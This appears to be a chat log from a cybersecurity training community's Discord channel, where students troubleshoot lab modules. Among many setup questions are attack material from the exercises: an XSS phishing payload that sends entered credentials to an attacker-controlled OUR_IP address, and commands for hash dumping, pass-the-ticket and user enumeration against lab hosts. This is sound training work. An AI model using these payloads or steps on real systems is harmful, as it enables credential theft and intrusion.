@quiet trout can you copy paste provide me those image's hex representation, like they did in modules?
sure, taking me a sec trying to get this shit straight i just set up the vm again, all that info was from yesterday
@exciton there yet? i think i got the issue.
i just need those hex values to confirm.
a bit of a nudge on the getting started module public exploits i got the exploit ready and i can't run it
pls help me in
windows prv escalation : Citrix Breakout
Submit the Administrator's flag from C:\Users\Administrator\Desktop
I conncected with smb my tools and execute ps1 files then found .msi file, but I dont execute that
then I tried to : Bypass-UAC -Method UacMethodSysprep
but not worked pls help me I can't that
i think i found it while getting the packet info.
here's the stripped down version of the rule, with just the 12 bytes and content:/images/
line 84 shows tcp PAYLOAD, similar to how it refers to in the explanation (packet payload) on the lab, i suppose the first 0x3a bytes are part of the tcp header and not part of the PAYLOAD, i didnt take this into account, as i thought the "packet payload" (tcp payload) was all the bytes. seems to be a confusion on terminology and what it meant specifically.
man im gonna have to go back thru these modules better understanding this stuff now and really take a closer look at what these rules are doing, this kinda sucks
you are right about that. however there is another thing to consider, not exactly in this case but this rule is inefficient since it misses HTTP sticky buffers, that could also lead to fragment HTTP requests or responses across multiple packets. If the relevant string is split across packets or if you miss part of it. it can also avoid detection.
it's good to refresh these concepts back, I literally thank you.
yeah, that was a few sections back, im gonna have to look that over again, and how it affects rule creation/trigger
you are really grinding slow and deep. It is good. CDSA is not a long path, so study in depth.
same, i gtg too. i hope i was helpful. see you later man.
guys pls
also, you gonna be stuck in snort module during assessment. i guess.
SWEET
looking forward to it already
hey thanks for helping a sanity check i do APPRECIATE the heck out of it
i was about to give up before you helped out now im somewhat reinvigorated to finish this hsit
anyone know why this wireshark filter isnt working?
this is so freaking fundamental it blows my mind, and its not working
if i change the filter to just frame.len == 9 or frame.len >= 9 && frame.len <= 10 that also fails
try udp.length
The frame is TCP.
err... the frame is IP
that failed too, it has to do with the payload being 9 bytes and the datagram being much larger, but im still getting very odd results... a filter like udp.length == 17 should in "theory" work? dunno still getting a blank output
the wireshark output is throwing me off len = payload size, not packet size
but the snort rule is saying "content: 9" which is referring to payload size, im trying to cross reference a snort rule with expected output in wireshark line by line but im getting kinda fucked at every turn
both filters "work" im just not doing it correctly
Hey guys do yu know if there is a plugin or something on obsidian for finding text on images?
and the section isnt really explaining how to cross reference this like im trying to do, to fully understand it instead of just "trust me bro"
so TLDR: skill issue
Yeah I can't help with any of that regarding the module -- haven't been there-- just that if you're trying to filter on the udp length, use udp.len. frame.len refers to the IP frame.
i see, defo gonna remember that
@shut vapor think you can help me better understand the contents of this UDP packet? from what i've read the UDP header is 8 bytes, the payload is the highlighted section an additional 34 bytes further along... not sure what the other 24 bytes are?
nvm
its other headers and stuff
not sure how that squares with this image which suggests the headers should equal 8 bytes, but ... iono...
Hi everyone. Do you guys know why is this evaluated as false? I'm doing the Type Juggling Auth Bypass from the Whitebox Attacks module in CWEE. I managed to solve the challenge, but this idea of magic hashes confuses me. Does it only work in PHP versions below 8.0.0 as well? Thanks!
Hey, im in the footprinting module inside the DNS page
I'm a bit confused of what answer i should give in this question Interact with the target DNS using its IP address and enumerate the FQDN of it for the "inlanefreight.htb" domain.
I think i understood:
they wanted me to find the ||namserver|| of that domain?
hello, about the sliver module; can u use armory modules without a beacon ?
The FQDN of the name server is searched for
Thanks
i dont think so, there would be no where to load them
but what about c2tc-domaininfo it just gets domain info ... do u really need a beacon for that ?
it cant just use magic to get access to the domain 
U can do it though:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-13 20:21 EDT
Nmap scan report for 10.129.98.244
Host is up (0.074s latency).
PORT STATE SERVICE
389/tcp open ldap
| ldap-rootdse:
| LDAP Results
| <ROOT>
| currentTime: 20241013232934.0Z
| subschemaSubentry: CN=Aggregate,CN=Schema,CN=Configuration,DC=MEGACORP,DC=LOCAL
| dsServiceName: CN=NTDS Settings,CN=MULTIMASTER,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=MEGACORP,DC=LOCAL
| namingContexts: DC=MEGACORP,DC=LOCAL
So why doesnt this C2 automate something that u can do -- isnt that its job
This doesn't look magical at all to me, it just looks like you're comparing two strings that are different from one another. I'll let someone else speak on magic hashes in php. I have no insight.
Where'd the other screen shot go? I was confused by its strcmp() != False double-negative.
Appreciate your help. I deleted the last example with strcmp because I messed that up XD
The "0e123..." expresion should be converted to a 0
im pretty sure c2tc is an authenticated domain search
but whats the problem with using another tool just like that
It might be a stupid question but i believe the module uses that as a vulnerable code
I'm reading about it now, this only applies if you're hashing the value. In your example above you're not hashing it AFAICT, you're just comparing two strings.
Shouldn't the first expression be true, then?
I might be losing it but it might be all about the PHP version in used
give me a minute, I'll try on my end
Sure, you can DM me if you want
Hello,
I'm doing Information Gathering > Subdomain Bruteforcing and I'm running the exact command they give :
dnsenum --enum inlanefreight.com -f /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt
All that I get are :
ns1.inlanefreight.com.
ns2.inlanefreight.com.
customer.inlanefreight.com.
And nothing else. If I understand the question correctly :
**Using the known subdomains for inlanefreight.com (www, ns1, ns2, ns3, blog, support, customer), find any missing subdomains by brute-forcing possible domain names. Provide your answer with the complete subdomain, e.g., www.inlanefreight.com.**
I'm supposed to find a new domain name like newdomainname.inlanefreight.com. I tried running the same command on www.inlanefreight.com, ns1.inlanefreight.com, ns2.inlanefreight.com but it doesn't give any result.
I also tried connecting or disconnecting my vpn with no luck, I also checked that I didn't accidently put an entry for inlanefreight.com in my /etc/hosts file. Can anybody hint me in the right direction?
try pwnbox
i got it instantly
The sha256sum is 0e46...., if you want to compare the output of hash() in php, the string you compare it against is just a string of that has value.
what cmd are you running and its output? you've identified the ns's but not what you're doing to enum the directorys and subdomains, not just the nameservers
In other words...
or are you using dns enum? i think that might've failed for me on my attempt at that section you might consider letting it run but also trying something like ffuf or dirbuster/gobuster
also use pwnbox if possible like @safe star mentioned
Ok, then the magic hashes don't really work since we are using loose comparisons. I will read the module again... It was probably changed in 8.0.0
Thanks for your help. Appreciate it
I'll try it out
The command I'm running is in my message, and the output is a few of the already known addresses. I have tried to run the command on subdomains like www.inlanefreight.com etc... but that gave me an error
yes I am using dnsenum, I'll try the pwnbox and if not successful will try gobuster ffuf etc.... thanks for your answer!
yeah the dnsenum tool according to its man page is for enumerating dns servers primarily, it looks like it has some limited functionality for finding subdomains based on the DNS records but i dont think i had very much luck with this, and better tools exist for the purpose, something to keep in mind for real world
Here is a full example of what they're trying to convey:
If you hash a value and the result begins with "0e", testing the result against 0 returns TRUE.
The next test I performed was to change the value I'm hashing so that it doesn't result in a hash starting with "0e" and it doesn't work the same way.
Okay so just for the information, I just ran it on the pwnbox and indeed it worked perfectly instantly. For some reason it doesn't work when I run it on my machine. No need to bruteforce subdomains just inlanefreight.com
I guess that's kind of a bug or something
Hi guys, I am doing the windows fundamentals module and I am trying to connect via RDP to the machine but I was getting errors. I tried to ping the machine and i got host is unreachable as a result. What can i do to resolve this issue and manage to connect to the server?
- ur VPN is working?does it say connection established?
- IP is correct ?
I got it, but the module gives a vulnerable code that compares it to the user's password from the database (not a zero). They mention multiple times that things changed with 8.0.0, but not when talking about magic hashes and that confused me. I hope we both learnt more about magic hashes XD. Thanks, though.
Vpn works, it says sequence completed so it works. and Ip is correct, i literally copy pasted it
can u refresh page and see if ur lab is still online
hi
It is, 111 minutes left
how can i chat on the normal chat??
it work before? is this new
it says i dont have perms
If it didnt work before, that means ur network has a firewall rule to stop the TCP or UDP, so try a different type of VPN
No it didn't, i am literally at the first module
ah so download tcp instead of udp then?
But btw if u want professional to help u with this then start a ticket on the website
kk
So in Lateral Movement Skills Assessment, Q2 asks for the flag.txt on Arturo's Desktop... Well I'm on Arturo's Desktop, and there be no flag.txt??? What gives? Anyone have any ideas?
how do you raise a ticket on discord btw? I usually dont use discord
in the Cross Site Scripting section of BBH, specifically the Phishing portion. I am having quite a bit of trouble with the attack.
document.write('<h3>Please login to continue</h3><form action=http://OUR_IP><input type="username" name="username" placeholder="Username"><input type="password" name="password" placeholder="Password"><input type="submit" name="submit" value="Login"></form>');document.getElementById('urlform').remove();<!--
the payload doesn't actually remove the form it also doesn't accept the document.getElementById i always see the broken link and
');document.getElementById('urlform').remove();
is there something I am missing here?
If u have a casual question or question that other students can help then u can use discord.
But if u have a problem with the connection or something wrong with the lab then u make a ticket on the website there is a green circle (bottom right) to make a ticket and message HTB support
Ah on the website itself, gotcha thanks!
There isn't only one Host in that environment, right!? 🤷♂️
That SA is pretty structured in a way that you have to jump from one Host to another
okay, I'll try to come at it another way
Support is via website only
Anyone know why I cant access the TestGroup share after adding pedro to the group and logging out and back in for DACL Attacks 1: AddMembers module?
I was able to get administrator on the target but am still stuck on the first flag
idk if you still need help. but the open button is way down at the bottom of the window, if you cannot see it, expand the application gui window by whatever means necessary.
Thanks. I will knock it out now.
Have you read your output?
Doesn't look like you added yourself to TestGroup
oh wait Im trolling
thanks
I thought backup operators had read on testgroup
not the actual group "TestGroup"
Think you have to abuse "Backup Operators" membership next
gotcha, yeah jumped the gun a little bit
thankyou
Try reading and executing the same steps as the Evasion Section
i read it and i believe i am already doin that
It's pretty much copy and paste
You found the Port
What command did you use to connect to the port you've found?
i am not really sure why none of this is working @dapper moth
Ok, I will respond to my own comment. They indeed give a very clear explanation on how strings are handled after 8.0.0 when doing loose comparisons. Reviewing the module and completing the next section while debugging locally cleared my mind. I try to avoid asking on the Discord server because I always feel dumb when looking at my comments... I guess it's part of the learning process.
Hi guys, i am confused how i should be able to answer the question of the module introduction to bash scripting, submodule: conditional execution if i literally never wrote a bash code before. The explanation in that module is not enough if you have never done bash scripting before. Feels like a lot of modules try to teach you one thing and then the question is something completely unrelated or the module itself didn't give you everything to be able to answer the question. Or is it me?
HTB Academy is tough. If you come from other platforms, everything feels like a capstone exercise XD. Feel free to send me a DM if you still need help 🙂
true
Hey i'm doing Login Brute Forcing and I was wondering if there's a recommended wordlist for password and username ? I know some module have them in the resources tab but it seem like theres nothing for this and I don't want to be bruteforcing for 1h
Pretty sure it's rock you
i don't think it's tough per se, not what i encountered as of yet at least, the problem is that the explanation in some modules is unclear/expect you already know something/is not in a chronological order/or they explain what 1+1 is and the question pertaining to that module is: How many donkeys are alive in Australia? But thanks for the help, i figured parts of it out with chatgpt
If they use something specific in the examples try to use that, otherwise rockyou is a good shout. If it doesnt go through in like 5 mins try something else, nothing should take hours to bruteforce
Good evening everyone
Some of the Skill Assessments are to make you research or to be challenging.
Wait till you go up the higher tier modules 
I don't complain though
Eh the skill assessments actually moreso test your ability to apply the knowledge
Id say rarely they require too much additional research
Again, depends on the module
I think I've ran into one maybe two modules that required external research bc it wasn't covered, or wasn't covered well
Hi I stuck on LDAP assessment last question. what is the non default privilege of htb-student? any nudge? I tried to run elevated powershell, it didn't work..
Linux Fundamentals is actual trash holy hell 💀
The RegEx topic literally says "here is how you use an extension, now magically know every part of regex"
Why include practice questions for something you were too lazy to put an explanation for
Ik it just takes a quick search or use of ai to get answers but its very frustrating when you pay for a service to teach you and you were too lazy to put a block of text explaining the necessary topics instead of quizzing us on topics not fundamentally covered at all
Idk this just feels insulting at this point
Are all the modules like this? Like beyond Linux Basics? If so I'm refunding asap
what are you talking about, the regex part of linux fundamentals doesn't even have any questions on it
just click "mark complete & next"
Cant upload a picture but there are optional questions too
Please dont use the defense that making them optional means you don't have to cover whats necessary to produce the results that are being asked for
it's not possible to include every single bit of information for everything that's covered in every module, that would make them too insanely big. a big part of pentesting is doing research and being able to learn a new tool or app quickly. i'd say the overwhelming majority of the modules are self contained and don't require outside knowledge, but some of them do expect you to have a certain baseline level of knowledge regardless.
Literally just including \b and \w* I dont see how that would make it extremely large. Just lazy
you're conflating stuff too like 'Know every part of regex', those simple exercises aren't even close to 'knowing everything'
I dont see how large modules are supposed to be an issue security isnt supposed to be a simple topic it requires you to know a lot of concepts and when/how to employ them. So what if theres a lot to read lmao if people have an issue with that they probably should go work as a fast food worker.
My concern is coming that there may be a trend of questions that are simply outside of what is covered, not a clever stretch just concepts as a whole.
not seeing anything in the optional exercises that aren't covered
regardless you'll need to do that for pentesting, a lot.
I don't see anything that will specifically pull for words starting/ending with a word. Only containing
did you not complete the previous sections?
I did
a lot of modules build off each other like that
it's covered in a previous section
was that it... or do you feel like something else wasn't covered?
I ended up just using what I had searched up so I'm unsure. Looking back the only thing I saw was the use of a caret
oh ok. you seemed pretty upset over it so i thought it would be more or something. yeah i found it in the find files an directories section
literally says -name *.conf With '-name', we indicate the name of the file we are looking for. The asterisk (*) stands for 'all' files with the '.conf' extension.
Yo! Does anyone ever get this error when using crackmapexec and netexec , I get this error in Password attacks module , I already remove and reinstall both tools but no luck with this error..
┌──(parallels㉿kali-linux-2022-2)-[/media/psf/Share Folder]
└─$ netexec smb 10.129.202.85 -u jmarston -p P@ssword! --ntds
Traceback (most recent call last):
File "/usr/bin/netexec", line 8, in <module>
sys.exit(main())
^^^^^^
File "/usr/lib/python3/dist-packages/nxc/netexec.py", line 143, in main
protocol_object = getattr(p_loader.load_protocol(protocol_path), args.protocol)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/usr/lib/python3/dist-packages/nxc/loaders/protocolloader.py", line 16, in load_protocol
loader.exec_module(protocol)
File "<frozen importlib._bootstrap_external>", line 995, in exec_module
File "<frozen importlib._bootstrap>", line 488, in _call_with_frames_removed
File "/usr/lib/python3/dist-packages/nxc/protocols/smb.py", line 10, in <module>
from impacket.examples.secretsdump import (
File "/usr/lib/python3/dist-packages/impacket/examples/secretsdump.py", line 69, in <module>
from impacket.ldap.ldap import SimplePagedResultsControl, LDAPSearchError
File "/usr/lib/python3/dist-packages/impacket/ldap/ldap.py", line 41, in <module>
import OpenSSL
File "/usr/lib/python3/dist-packages/OpenSSL/__init__.py", line 8, in <module>
from OpenSSL import crypto, SSL
File "/usr/lib/python3/dist-packages/OpenSSL/crypto.py", line 1579, in <module>
class X509StoreFlags(object):
File "/usr/lib/python3/dist-packages/OpenSSL/crypto.py", line 1598, in X509StoreFlags
NOTIFY_POLICY = _lib.X509_V_FLAG_NOTIFY_POLICY
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
AttributeError: module 'lib' has no attribute 'X509_V_FLAG_NOTIFY_POLICY'. Did you mean: 'X509_V_FLAG_EXPLICIT_POLICY'?
probably because you didn't wrap the password in quotes, it contains special characters.
hey hey stay. u solve it?
seems like a dependency problem tbh
I would do a clean reinstall with pipx
yeah could be
Hello
there are plenty of people here who can help, which module/section/question are you stuck on?
How do u guys learn to hack
academy
Kinda perplexed as to what's happening here.
I'm in Web Attacks Skills Assessment.
I'm at the very last step, trying to obtain my base64 hash.
I used a malicious XXE payload so I can read the flag file.
I made the necessary adjustments, and hit send in the web developer.
All I'm getting is "Event " has been created" in the Response tab. So I know the code worked, but I'm not getting the base64 hash so I can grab my flag.
Any help?
of course
probably best to chat about it in #general this channel is for the modules on the academy
read and follow the instructions in #welcome
this is not the place to ask for help for this sort of thing
as i said, read and follow the instructions in #welcome
no one here is going to help you get your account back or something, this discord is about the hackthebox platform, your only recourse to get your account would be to reach out to the service who provided it.
I did it
If you want to take part in the community of Hack The Box, great, follow the instructions in #welcome. If you just want to wave your arms about a "hacked account", then just leave.
anyone around i can dm about skill assement 1 on login brute forcing?
for a sanity check. I tried it the way learned in the module and using the recommended password list and pass not found.
tried using recommended password and user list and its saying 38 hours to run
nm got it
Helpful hint for other users: verify after downloading wordlists that they downloaded correctly. Lol
reset the target machine and try again.
Hello 👋
hi
Hi
type shi
is the CORS misconfig question working for you
It worked once, not sure how because I couldn’t reproduce
Made a post already, think the module is broken
what about the section before
What
I already answered that nerd
great
ok I managed to solve it but one part isn't really mentioned

also I have to include the port number unlike the previous section or else it goes to 443
Hello everyone help me pls
Windows Privilege Escalation : Interacting with Users
Using the techniques in this section obtain the cleartext credentials for the SCCM_SVC user.
I need to put my .scf file on the smb share but there is no writable folder for me
pls give me some hint
With port number still failed for me
I think the only time it worked was when I removed the ports
Yeah
It annoyed me that it didn’t work even though my payloads were correct
So I just skipped the module
there are writeable folder, look through all of them
there can be subfolders
Let me know if that next section works for you
And what your payload is
I cant find I tried to public folder but not worked
did you mean in smbclient ?
there are other places than public
I'd suggest using impacket's smbclient.py or smbclient-ng
HI
Password Attacks > Pass the Ticket (PtT) from Linux
Q/ Check the /tmp directory and find Julio's Kerberos ticket (ccache file). Import the ticket and read the contents of julio.txt from the domain share folder \DC01\julio.
i have the ticket of julio but i can't access with smbclient
smbclient //dc01/C$ -k -no-pass
root@linux01:~# klist
Ticket cache: FILE:/root/krb5cc_6######_######
Default principal: julio@INLANEFREIGHT.HTB
Valid starting Expires Service principal
10/07/2022 11:32:01 10/07/2022 21:32:01 krbtgt/INLANEFREIGHT.HTB@INLANEFREIGHT.HTB
renew until 10/08/2022 11:32:01
any ideas?
find a ticket that's valid
it worked thank you so much
thanks i will try
Hey!
I'm stuck in Footprinting page SMTP
The question is Enumerate the SMTP service even further and find the username that exists on the system. Submit it as the answer.
Tried to run the command ||smtp-user-enum -M RCPT -U ./footprinting-wordlist.txt -t 10.129.19.215||
And I get 0 results
The wordlist is the one under the resources, so it should be updated
I dont understand, It worked on metasploit but not on smtp-user-enum
Why is that?
maybe you using the wrong smtp command?
lol the example in the section worked for me, had to add the port otherwise it's the same
had to use the burp browser to test tho, for some reason the script isn't being loaded in firefox
hi, could someone tell me what the answer format is for section "identifying hashes" on module: cracking passwords with hashcat.
Can you dm me your payload and post req?
what do you mean?
have you tried using VRFY instead?
yes
metasploit worked and smtp-user-enum didnt
a bit weird, maybe its not reliable tool
does anyone know why, in intro to network traffic analysis i keep getting this error when trying to start the capture "tcpdump: ens3: You don't have permission to perform this capture on that device
(socket: Operation not permitted)"
i also get tcpdump: option requires an argument -- 'i'
even when im using -i. straight out copy pasting it from the solution
run as sudo?
then i get the requires an argument -i
even if i use sudo tcpdump -i #3
even this question, which i answer with -| gives me incorrect "What TCPDump switch will allow us to pipe the contents of a pcap file out to another function such as 'grep'?"
#3 is not an interface name
Bro There is nor writable folder
ok say i use lo
which is number 3
the answer is -1 not -|, can anyone explain that to me
neither of those are the answer, read the manual?
it's -l not -1
Hey, a question about SNMP page under Footprinting
I've found the answer to all of the questions, but on the last question Enumerate the custom script that is running on the system and submit its output as the answer.
does snmp provides the output of commands executed on the device?
I didnt fully understand why I saw the script, and the output of it under the snmpwalk
Do you still need help?
I flipped and it worked
Nah I got it. Was doing the right thing but had a bad download on the user and pass wordlists.
Re-download them and reran and was gold.
https://academy.hackthebox.com/module/144/section/1251 I already completed this module however im trying to re cap on stuff however i cant replicate the answers i got before is it because the DNS servers have probably been updated?
No that should not be the case. Show us your terminal cmd and output for each exercise (i think there's only 3?)
copy paste from terminal window
im doing the skills assessment from web proxies and I put in the URL and the page is just blank
I reset the target twice now
; <<>> DiG 9.18.16-1~deb12u1~bpo11+1-Debian <<>> inlanefreight.com
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 43608
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1
;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 512
;; QUESTION SECTION:
;inlanefreight.com. IN A
;; ANSWER SECTION:
inlanefreight.com. 300 IN A 134.209.24.248
;; Query time: 20 msec
;; SERVER: 194.168.4.100#53(194.168.4.100) (UDP)
;; WHEN: Tue Oct 15 14:59:05 BST 2024
;; MSG SIZE rcvd: 62
- dig -x 134.209.24.248
; <<>> DiG 9.18.16-1~deb12u1~bpo11+1-Debian <<>> -x 134.209.24.248
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 62366
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1
;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 512
;; QUESTION SECTION:
;248.24.209.134.in-addr.arpa. IN PTR
;; ANSWER SECTION:
248.24.209.134.in-addr.arpa. 1800 IN PTR inlanefreight.com.
;; Query time: 96 msec
;; SERVER: 194.168.4.100#53(194.168.4.100) (UDP)
;; WHEN: Tue Oct 15 15:01:36 BST 2024
;; MSG SIZE rcvd: 87
- dig MX facebook.com
; <<>> DiG 9.18.16-1~deb12u1~bpo11+1-Debian <<>> MX facebook.com
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 63906
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1
;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 512
;; QUESTION SECTION:
;facebook.com. IN MX
;; ANSWER SECTION:
facebook.com. 1782 IN MX 10 smtpin.vvv.facebook.com.
;; Query time: 16 msec
;; SERVER: 194.168.4.100#53(194.168.4.100) (UDP)
;; WHEN: Tue Oct 15 15:02:31 BST 2024
;; MSG SIZE rcvd: 68
@quiet trout
you got it, the answers are there are you having trouble parsing the output?
None of those answers are the same as what i entered last time for example the ip address for inlanefreight was 204.74.99.103
oh in that case yes, the DNS has changed
okay thankyou i was just confused thats all
╰─ dig inlanefreight.com ─╯
; <<>> DiG 9.18.28-0ubuntu0.24.04.1-Ubuntu <<>> inlanefreight.com
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 36377
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1
;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 65494
;; QUESTION SECTION:
;inlanefreight.com. IN A
;; ANSWER SECTION:
inlanefreight.com. 300 IN A 134.209.24.248
;; Query time: 79 msec
;; SERVER: 127.0.0.53#53(127.0.0.53) (UDP)
;; WHEN: Tue Oct 15 09:07:36 CDT 2024
;; MSG SIZE rcvd: 62
ur vpn all good?
ah
its prolly cuz u need to visit the right directory
like /lucky.php for the first exercise
You can configure SNMP to return the results of a script... but usually a lot of other stuff.
If you think working with snmp agents is weird, don't look at the config for snmp managers. Oof. 😅
Yes It did change
Currently doing Kerberoast attack module. I'm stuck at
||Unconstrained delegation - Computers question no.2 as you can see the Ticket is already loaded but still failing to read the flag.|| Can someone help me?
try using the fqdn
fqdn where exactly? while reading the flag?
this is because of whatever you used to write it has created a partition that the image was written to, if you're doing this in windows use the disk management tool, if you're doing it in linux use gparted
a lack of sig in windef
Still getting this error? Can you elaborate more @next bronze ?
which ticket did you import? dc01's?
Yeah after performing the printer attack
Also can I DM you to avoid any spoilers here in the chat?
so what's the step after gettting dc's tgt in the module?
It says dcsync to get hashes of the users but I'm not able to perform dcsync
why not
Wait let me try the attack once again and get back to you
I didn't fully understand what is the difference between information schema and system schema and when we use it
(Related to MySQL)
or would i need to see traffic on the router for that info?
and/or traffic on the dns server?
would anyone be able to help me with the cicada machine?
on Attacking Common Services - Easy
i have creds but when i auth by using mysql i got this
mysql -u f#### -p####### -h 10.129.203.7
ERROR 2002 (HY000): Received error packet before completion of TLS handshake. The authenticity of the following error cannot be verified: 1129 - Host '10.10.14.128' is blocked because of many connection errors; unblock with 'mysqladmin flush-hosts'
does anyone know this
doesn't look familiar and I haven't got any notes suggesting I had to adjust how I connect to mysql for that assessment. Make sure the system is still up and the port is still open. You can try the "flush-hosts" command suggested or restart the lab even.
ping 10.129.203.7
PING 10.129.203.7 (10.129.203.7) 56(84) bytes of data.
64 bytes from 10.129.203.7: icmp_seq=1 ttl=127 time=162 ms
64 bytes from 10.129.203.7: icmp_seq=2 ttl=127 time=162 ms
I also tried rdp but nothing
i solved it
mysql -u ##### -p######## -h 10.129.85.156 --skip-ssl
I'll note it down. it could've been something I just tried and worked & forgot about it
guys i am struggling with a HTB's problem about connections , please if anyone can help with this one .About module Windows :Attacks and Defence , cant connect via kali and then rdp to the static ips
depending on the section you're working on, you can't RDP/SSH to Kali
i am struggling like 1 week now
yes on the section etc, PKI - ESC1
i want to RDP to the windows static machine via the kali (hack the box's kali ip)
i get the error : Authorization required, but no authorization protocol specified
[13:09:34:412] [3025:3025] [ERROR][com.freerdp.client.x11] - failed to open display: :10.0
[13:09:34:412] [3025:3025] [ERROR][com.freerdp.client.x11] - Please check that the $DISPLAY environment variable is properly set.
every time , yes i did the step correct
are you SSHed to Kali?
you can try doing X11 forwarding
static ips dont connect even under my kali with vpn file
can you explain ?
SSH into Kali with the -X option
okey
then try RDPing to WS001
nice
do i need to have an external wifi adapter to complete Wi-Fi Penetration Testing Basics htb?
too fast, lol it didn't work, it closed and now i get the same error
no wifi hardware required
xfreerdp /u:eagle\bob /p:Slavi123 /v:172.16.18.25 /dynamic-resolution
X11 connection rejected because of wrong authentication.
[13:45:26:927] [11610:11610] [ERROR][com.freerdp.client.x11] - failed to open display: localhost:10.0
[13:45:26:927] [11610:11610] [ERROR][com.freerdp.client.x11] - Please check that the $DISPLAY environment variable is properly set.
might have to set this variable to 11?
Hello
X11 connection rejected because of wrong authentication.
not sure what this means
hmm...
After performing the previous attack, connect to DC1 (172.16.18.3) as 'htb-student:HTB_@cademy_stdnt!' and make the appropriate change to the registry to prevent the PrinterBug attack. Then, restart DC1 and try the same attack again. What is the error message seen when running dementor.py?
this question on Print Spooler & NTLM Relaying
i am trying to connect to the DC1 using the kali machine but it says this
xfreerdp /u:htb-student /p:HTB_@cademy_stdnt! /v:172.16.18.3 /dynamic-resolution
[13:46:56:688] [881:881] [ERROR][com.freerdp.client.x11] - failed to open display:
[13:46:56:689] [881:881] [ERROR][com.freerdp.client.x11] - Please check that the $DISPLAY environment variable is properly set
the same error with me
can anyone help me please i been stuck on this for the past 2 days
Admins lol
but if i run command iwconfig it shows "no wireless extensions"
i haven't done the module, so i can't tell you what's wrong
Is there anyone else who completed this module?
a lot people have this issue
the main problem is that we cant connect to the static ips
something's wrong with getting the X11 display to work
wait i did it
i xfreerdp to the kali so i got access to the kali GUI
then from there xfreerdp to the DC1
i think the problem is that when sshing to the kali machine you are only getting the shell not the display
so a display wont open when trying xfreerdp elsewhere
yes i cant do this also
that's why you put the -X option in your SSH command
which worked for Nemes1s and then it stopped working for some reason
for just a sec with this parameter it worked but not too much
you can try switching VPNs maybe
maybe an instance spun up in a different region will not have the issue
or just contact support
nemes1s
yes
i changed the server now
share screen
oh OKAY didnt know that
and did they say anything back?
┌──(root㉿kali)-[/home/kali]
└─# xfreerdp /u:eagle\bob /p:Slavi123 /v:172.16.18.25 /dynamic-resolution
Authorization required, but no authorization protocol specified
[14:02:03:014] [15639:15639] [ERROR][com.freerdp.client.x11] - failed to open display: :10.0
[14:02:03:014] [15639:15639] [ERROR][com.freerdp.client.x11] - Please check that the $DISPLAY environment variable is properly set.
the same problem with the another server
they said to me to wait 10 min in order the machines to load
but i am here more than 2 hours
Try remmina
i tried already
Black screen?
first of all remmina doesnt exists in kali machine
Hack The Box's machine
and when i go to download it doesnt download
@wet valve what user do you RDP as to Kali
i mean what's the credentials you use to RDP to Kali
then run xfreerdp as kali, not root
you don't need to be root on the kali box
you should be able to RDP to WS001 then
brother it worked,
Hello Guys! I need help again 😅 I'm kinda stuck on the smtp section from footprinting, I can't figure out what's the "included Footprinting resource list". Can someone help me?
the solution is that i must not connect when i am root
that's because root doesn't have the $DISPLAY variable set
oh...
general rule of thumb is don't be root unless you absolutely need to be root
thanks again for this service means a lot to me
Hi guys, anyone do skill assessment 1 in Active directory enum and exploitation module? I'm stuck on the very last question. I performed DCsync with the user via mimikatz, I got administrator NTLM hash dump and pth is just not WORKING. I have my portfwd going to smb port, and I have tested by running the same payload from meterpreter: by putting in the right credentials I receive access denied, when i purposely type the wrong password I get the same error i keep getting when I'm trying pth .. anyone had this problem too, or is my lab buggy giving the wrong hash? Been stuck at this, even had to look at a walkthrough and they are also performing pth
Hi guys, i am in the NTFS vs. Share Permissions submodule. And i am trying to mount to the share with the command provided by HTB which is (sudo mount -t cifs -o username=htb-student,password=Academy_WinFun! //ipaddoftarget/"Company Data" /home/user/Desktop/). I changed the ip addr to the ip of the target but when i run it i get this error: Couldn't chdir to /home/ThisPC/Desktop/: No such file or directory
But I created the folder on the remote target with the exact same name "Company Data", and I still get the error
If anyone cares I finally got it, SMB was the problem set up portfwd to 5985 and authenticated via evilwinrm also matched the NT hash with 000s:
check the resources on the top right
you've got some problems with your directory setup, you need to use the windows hostname as well as the username of the current user instead of ThisPc
open up a cmd.exe and type pwd and whoami to better understand the actual location you're targeting
I did
Oh, my bad, i was looking in cheat sheet 😭
hi, i have a pretty stupid problem 😭 how do i turn on CMD on virtual machine (windows introduction module) because i dont have toolbar and windows + r is not working
i copied the wrong one, but it should be /home/users/htb-student/Desktop then?
aah no wait
Your directory where company data is needs to be an smb share on the network. One that's actually shared. And your mount location I'm afk so I'm unsure at the moment I would ask chat gpt for a simplified example of the mount to demonstrate the process for you but you almost have it
i have to change user to the user itself as well if im not mistaken
guys is there a way to get streak saver without annual subscription
Yes i already created it and shared it, ill see what i can find, thanks
i have a student plan btw
hey someone can help me with Attacking GraphQL module and skills assessment i found a api key but there is no login page
okay got it myself i just used windows powershell
No i am not getting it, dont exactly know what im doing wrong. Im fried lol, need a break.
hello i need a little help. Im in the academy on Password Attacks and got smb credentials. These are correct and i can connect. but i cant navigate. it seems to be disabled. the ls o dir command is not function.
you dont have permissions
Hi, it feels like the "Web Services Description Language" section of "Web Service & API Attacks" module is outdated(?). The wordlist path does not match and it suggests using "dirb", which was not installed on my box. Is this the right place to "report" this? 🙂
My point is, it's not possible to follow the instructions .. Which I assume is the intention of the module. That's all. 🙂
Can you send a screenshot of module and problem you got?
I mean an instruction in the module
okay...
"sudo apt install dirb"
i guess
You can always use another fuzzer
and a bit later it mentions the path ~/Desktop/... for the path for the wordlist(s) but it's really under /opt/useful/..
